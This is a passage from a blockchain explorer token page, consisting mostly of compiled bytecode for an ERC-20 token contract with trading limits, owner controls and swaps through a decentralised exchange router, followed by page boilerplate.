00000000000000000000000000000000000000000000815260040161252b9190612cce565b60405180910390fd5b505f8385612542919061384a565b9050809150509392505050565b5f80828461255d9190613683565b9050838110156125a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612599906138c7565b60405180910390fd5b8091505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361261a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612611906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612688576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267f90613542565b60405180910390fd5b6126938383836129c5565b6126fc81604051806060016040528060268152602001613b1c602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061278b815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128289190612e9e565b60405180910390a3505050565b5f61283f30610c7f565b9050601460095461285091906137ac565b81111561286957601460095461286691906137ac565b90505b81811115612875578190505b5f81111561288757612886816129ca565b5b5f6015819055505f6014819055505f60168190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015612900573d5f803e3d5ffd5b505050565b5f808303612915575f9050612976565b5f828461292291906137ac565b9050828482612931919061381a565b14612971576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161296890613955565b60405180910390fd5b809150505b92915050565b5f6129bd83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612bfd565b905092915050565b505050565b5f600267ffffffffffffffff8111156129e6576129e5613973565b5b604051908082528060200260200182016040528015612a145781602001602082028036833780820191505090505b50905030815f81518110612a2b57612a2a6139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612af291906139e1565b81600181518110612b0657612b056139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612b6b307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461189b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612bcc959493929190613ac3565b5f604051808303815f87803b158015612be3575f80fd5b505af1158015612bf5573d5f803e3d5ffd5b505050505050565b5f8083118290612c43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c3a9190612cce565b60405180910390fd5b505f8385612c51919061381a565b9050809150509392505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612ca082612c5e565b612caa8185612c68565b9350612cba818560208601612c78565b612cc381612c86565b840191505092915050565b5f6020820190508181035f830152612ce68184612c96565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1b82612cf2565b9050919050565b612d2b81612d11565b8114612d35575f80fd5b50565b5f81359050612d4681612d22565b92915050565b5f819050919050565b612d5e81612d4c565b8114612d68575f80fd5b50565b5f81359050612d7981612d55565b92915050565b5f8060408385031215612d9557612d94612cee565b5b5f612da285828601612d38565b9250506020612db385828601612d6b565b9150509250929050565b5f8115159050919050565b612dd181612dbd565b82525050565b5f602082019050612dea5f830184612dc8565b92915050565b5f60208284031215612e0557612e04612cee565b5b5f612e1284828501612d38565b91505092915050565b5f819050919050565b5f612e3e612e39612e3484612cf2565b612e1b565b612cf2565b9050919050565b5f612e4f82612e24565b9050919050565b5f612e6082612e45565b9050919050565b612e7081612e56565b82525050565b5f602082019050612e895f830184612e67565b92915050565b612e9881612d4c565b82525050565b5f602082019050612eb15f830184612e8f565b92915050565b5f805f60608486031215612ece57612ecd612cee565b5b5f612edb86828701612d38565b9350506020612eec86828701612d38565b9250506040612efd86828701612d6b565b9150509250925092565b5f60ff82169050919050565b612f1c81612f07565b82525050565b5f602082019050612f355f830184612f13565b92915050565b612f4481612d11565b82525050565b5f602082019050612f5d5f830184612f3b565b92915050565b612f6c81612dbd565b8114612f76575f80fd5b50565b5f81359050612f8781612f63565b92915050565b5f8060408385031215612fa357612fa2612cee565b5b5f612fb085828601612d38565b9250506020612fc185828601612f79565b9150509250929050565b5f8060408385031215612fe157612fe0612cee565b5b5f612fee85828601612d38565b9250506020612fff85828601612d38565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061304d57607f821691505b6020821081036130605761305f613009565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61309a602083612c68565b91506130a582613066565b602082019050919050565b5f6020820190508181035f8301526130c78161308e565b9050919050565b7f54726164696e6720616c726561647920656e61626c65640000000000000000005f82015250565b5f613102601783612c68565b915061310d826130ce565b602082019050919050565b5f6020820190508181035f83015261312f816130f6565b9050919050565b5f819050919050565b5f61315961315461314f84613136565b612e1b565b612d4c565b9050919050565b6131698161313f565b82525050565b5f60c0820190506131825f830189612f3b565b61318f6020830188612e8f565b61319c6040830187613160565b6131a96060830186613160565b6131b66080830185612f3b565b6131c360a0830184612e8f565b979650505050505050565b5f815190506131dc81612d55565b92915050565b5f805f606084860312156131f9576131f8612cee565b5b5f613206868287016131ce565b9350506020613217868287016131ce565b9250506040613228868287016131ce565b9150509250925092565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61328c602683612c68565b915061329782613232565b604082019050919050565b5f6020820190508181035f8301526132b981613280565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f6132f4601683612c68565b91506132ff826132c0565b602082019050919050565b5f6020820190508181035f830152613321816132e8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613382602483612c68565b915061338d82613328565b604082019050919050565b5f6020820190508181035f8301526133af81613376565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613410602283612c68565b915061341b826133b6565b604082019050919050565b5f6020820190508181035f83015261343d81613404565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61349e602583612c68565b91506134a982613444565b604082019050919050565b5f6020820190508181035f8301526134cb81613492565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61352c602383612c68565b9150613537826134d2565b604082019050919050565b5f6020820190508181035f83015261355981613520565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613594601683612c68565b915061359f82613560565b602082019050919050565b5f6020820190508181035f8301526135c181613588565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613622603583612c68565b915061362d826135c8565b604082019050919050565b5f6020820190508181035f83015261364f81613616565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61368d82612d4c565b915061369883612d4c565b92508282019050808211156136b0576136af613656565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6136ea601383612c68565b91506136f5826136b6565b602082019050919050565b5f6020820190508181035f830152613717816136de565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613778603683612c68565b91506137838261371e565b604082019050919050565b5f6020820190508181035f8301526137a58161376c565b9050919050565b5f6137b682612d4c565b91506137c183612d4c565b92508282026137cf81612d4c565b915082820484148315176137e6576137e5613656565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61382482612d4c565b915061382f83612d4c565b92508261383f5761383e6137ed565b5b828204905092915050565b5f61385482612d4c565b915061385f83612d4c565b925082820390508181111561387757613876613656565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6138b1601b83612c68565b91506138bc8261387d565b602082019050919050565b5f6020820190508181035f8301526138de816138a5565b9050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61393f602183612c68565b915061394a826138e5565b604082019050919050565b5f6020820190508181035f83015261396c81613933565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f815190506139db81612d22565b92915050565b5f602082840312156139f6576139f5612cee565b5b5f613a03848285016139cd565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613a3e81612d11565b82525050565b5f613a4f8383613a35565b60208301905092915050565b5f602082019050919050565b5f613a7182613a0c565b613a7b8185613a16565b9350613a8683613a26565b805f5b83811015613ab6578151613a9d8882613a44565b9750613aa883613a5b565b925050600181019050613a89565b5085935050505092915050565b5f60a082019050613ad65f830188612e8f565b613ae36020830187613160565b8181036040830152613af58186613a67565b9050613b046060830185612f3b565b613b116080830184612e8f565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122071e2821e4bba1b74a52d1bb473a2eea7024d5feb05064f91f138e0584f1aa06164736f6c63430008190033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.